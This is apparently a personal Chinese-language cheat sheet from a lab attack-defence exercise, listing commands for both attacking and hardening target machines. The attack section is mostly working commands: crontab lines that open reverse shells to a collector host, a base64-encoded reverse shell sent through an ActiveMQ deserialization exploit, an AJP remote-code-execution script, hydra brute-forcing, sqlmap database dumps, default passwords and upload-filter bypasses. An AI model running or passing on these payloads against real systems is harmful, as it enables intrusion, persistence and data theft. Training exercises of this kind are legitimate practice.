最后两天进行攻防演练实战。
结果还行,搞了个小米音箱,继续努力吧。
记了些脚本,以便快速攻防。
attack
签到
http://192.168.20.158/robots.txt
http://192.168.40.196/robots.txt
弱口令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| ssh chenyf@192.168.20.253
ssh chenyf@192.168.40.200
echo '*/1 * * * * root echo "bash -i >& /dev/tcp/192.168.30.123/110 0>&1" | bash -i' >> /etc/crontab
echo '*/1 * * * * root echo "bash -i >& /dev/tcp/192.168.30.123/120 0>&1" | bash -i' >> /etc/crontab
mysql -h 192.168.20.158 -u root -proot
mysql -h 192.168.40.196 -u root -proot
rdesktop -f -a 16 192.168.20.158:3389
rdesktop -f -a 16 192.168.40.196:3389
ftp 192.168.20.158
anonymous
ftp 192.168.40.196
anonymous
|
网站后台
http://192.168.20.158/?/admin/
http://192.168.40.196/?/admin/
扫网站flag
dirb http://192.168.20.158/ dict/dirb_zidian.txt
dirb http://192.168.40.196/ dict/dirb_zidian.txt
爆破弱口令
1
2
3
4
5
6
7
| hydra -L dict/user.txt -P dict/pass.txt -vV -e ns 192.168.20.158 ssh -f
hydra -L dict/user.txt -P dict/pass.txt -vV -e ns 192.168.40.196 ssh -f
hydra 192.168.20.158 rdp -L dict/user.txt -P dict/pass.txt -V -f
hydra 192.168.40.196 rdp -L dict/user.txt -P dict/pass.txt -V -f
|
中间件漏洞
- ActiveMQ
抢时间提前访问:
http://192.168.20.253:8161/admin/browse.jsp?JMSDestination=event
http://192.168.40.200:8161/admin/browse.jsp?JMSDestination=event
1
2
3
4
5
6
7
8
| bash –i >& /dev/tcp/192.168.30.123/4444 0>&1
YmFzaCATaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyMy80NDQ0IDA+JjE=
java -jar jmet/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCATaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.20.253 61616
java -jar jmet/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCATaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.40.200 61616
nc -lvp 4444
|
- Ajp
1
2
3
| python3 2020-10487.py -p 8009 -f /WEB-INF/shell.jsp 192.168.20.253 --rce 1
python3 2020-10487.py -p 8009 -f /WEB-INF/shell.jsp 192.168.40.200 --rce 1
|
- Weblogic weak password
http://192.168.20.253:7001/console
http://192.168.40.200:7001/console
weblogic
Oracle@123
sql
burp抓包
1
2
3
| sqlmap -r sql.txt --dbs
sqlmap -r sql.txt -D security --tables
sqlmap -r sql.txt -D security -T users --dump
|
upload
1
2
3
4
5
6
7
8
9
| .PHP
.php3 .phtml
.php.
. php
.pphphp
content/type:image/png
GIF89a
|
defence
改密码
1
2
| sudo passwd chenyf
sudo passwd root
|
http://192.168.30.200/?/admin/
删用户
1
2
| cat /etc/passwd 看最后一行
deluser [user]
|
控制面板 - 用户账户 - 删除用户账户
踢人
1
2
3
| w
ps -ef | grep ssh 找到进程的[pid]
kill -9 [pid]
|
中间件漏洞
先 docker ps 记 id
- ActiveMQ
1
2
3
4
5
| wget -O /tmp/jetty-realm.properties http://192.168.30.123/jetty-realm.properties
docker cp /tmp/jetty-realm.properties [docker_id]:/opt/apache-activemq-5.11.1/conf/jetty-realm.properties
docker restart [docker_id]
|
- Ajp
1
2
3
4
5
| wget -O /tmp/server.xml http://192.168.30.123/server.xml
docker cp /tmp/server.xml [docker_id]:/usr/local/tomcat/conf/server.xml
docker restart [docker_id]
|
- Weblogic weak password
改密码,麻溜点
http://192.168.30.100:7001/console
weblogic
Oracle@123
网页漏洞 改httpd.conf
加:
1
2
3
4
| <Files ~ "flag.txt">
Order allow,deny
Deny from all
</Files>
|
关闭ftp匿名访问
1
2
3
4
5
6
7
| vim /etc/vsftpd/vsftpd.conf //修改配置文件
找到vsftpd.conf中的:
anonymous_enable=yes //改为no;(yes=允许、no=禁止)
保存退出
service vsftp restart //重启FTP服务
|
本地日志查flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| cat [log] | grep flag
log:
/var/log/messages
/var/log/dmesg
/var/log/auth.log
/var/log/boot.log
/var/log/daemon.log
/var/log/dpkg.log
/var/log/kern.log
/var/log/lastlog
/var/log/maillog
/var/log/user.log
/var/log/Xorg.x.log
/var/log/alternatives.log
/var/log/btmp => last -f /var/log/btmp | more
/var/log/wtmp
/var/log/utmp
/var/log/cups
/var/log/anaconda.log
/var/log/yum.log
/var/log/cron
/var/log/secure
/var/log/faillog
cat /etc/passwd
cat /etc/shadow
|
apache下的access.log、error.log。